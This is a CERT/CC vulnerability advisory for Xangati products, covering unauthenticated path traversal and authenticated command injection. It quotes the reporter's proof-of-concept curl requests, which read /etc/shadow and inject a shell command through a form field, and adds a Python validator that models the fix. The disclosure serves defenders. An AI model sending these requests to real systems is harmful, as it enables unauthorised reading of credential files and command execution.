
CERT Coordination Center

Xangati software release contains relative path traversal and command injection vulnerabilities

Vulnerability Note VU#657622

Original Release Date: 2014-04-14 | Last Revised: 2014-04-14

Overview

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

Description

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

CWE-23: Relative Path Traversal - CVE-2014-0358
The reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities.

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/Installer'

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'

CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359
The reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability.

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://127.10.10.5/servlet/Installer'
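
The following is an added example, not code from CERT/CC, the reporter or Xangati: a Python check modelling the server-side fix for both issues above. It confines the file, download and binfile parameters to an assumed base directory (decoding repeatedly, so double-encoded input is also caught, which goes beyond the PoCs shown) and rejects shell metacharacters in params. The base directory /opt/xangati and the request bodies are constructed for the example.

```python
import os
from urllib.parse import parse_qs, unquote

# Assumed install root and parameter names (constructed for this example; the
# advisory names the parameters but not the real on-disk layout).
BASE_DIR = "/opt/xangati"
FILE_PARAMS = ("file", "download", "binfile")
SHELL_META = set(";|&`$\n")

def decode_fully(value, rounds=3):
    """Percent-decode until stable so double-encoded input is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def resolve_confined(base, user_path):
    """Absolute path if user_path stays inside base after normalisation, else None."""
    base_real = os.path.realpath(base)
    # A leading '/' would make os.path.join discard base, so treat it as relative.
    relative = decode_fully(user_path).lstrip("/")
    candidate = os.path.realpath(os.path.join(base_real, relative))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate

def flag_request(body):
    """Return sorted names of form parameters that fail the two checks."""
    flagged = set()
    # separator='&' keeps ';' inside values (it is a shell metacharacter, not a delimiter).
    for name, values in parse_qs(body, keep_blank_values=True, separator="&").items():
        for value in values:
            if name in FILE_PARAMS and resolve_confined(BASE_DIR, value) is None:
                flagged.add(name)
            elif name == "params" and SHELL_META & set(value):
                flagged.add(name)
    return sorted(flagged)

# Constructed request bodies: one legitimate, then shapes modelled on the PoCs above.
OK_BODY = "key=k&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2Fstatus.txt"
TRAVERSAL_BODY = "key=k&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow"
DOUBLE_ENCODED_BODY = "key=k&binfile=%252Fourlogs%252F..%252F..%252F..%252Fetc%252Fshadow"
INJECTION_BODY = "key=k&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=-p+localhost;true;+YES"

if __name__ == "__main__":
    for body in (OK_BODY, TRAVERSAL_BODY, DOUBLE_ENCODED_BODY, INJECTION_BODY):
        print(flag_request(body) or "clean", "<-", body)
```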

The CVSS score below is for CVE-2014-0359.

Impact

A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.

Solution

Apply an Update

Upgrade to XSR11 or XNR 7 for the appropriate product.

Vendor Information


Xangati Inc

Notified:  January 23, 2014 Updated:  April 11, 2014

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.


CVSS Metrics

Group          Score   Vector
Base           9.4     AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal       8.2     E:ND/RL:OF/RC:C
Environmental  2.1     CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

Acknowledgements

Thanks to Jan Kadijk for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

CVE IDs: CVE-2014-0358, CVE-2014-0359
Date Public: 2014-04-14
Date First Published: 2014-04-14
Date Last Updated: 2014-04-14 20:30 UTC
Document Revision: 11

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.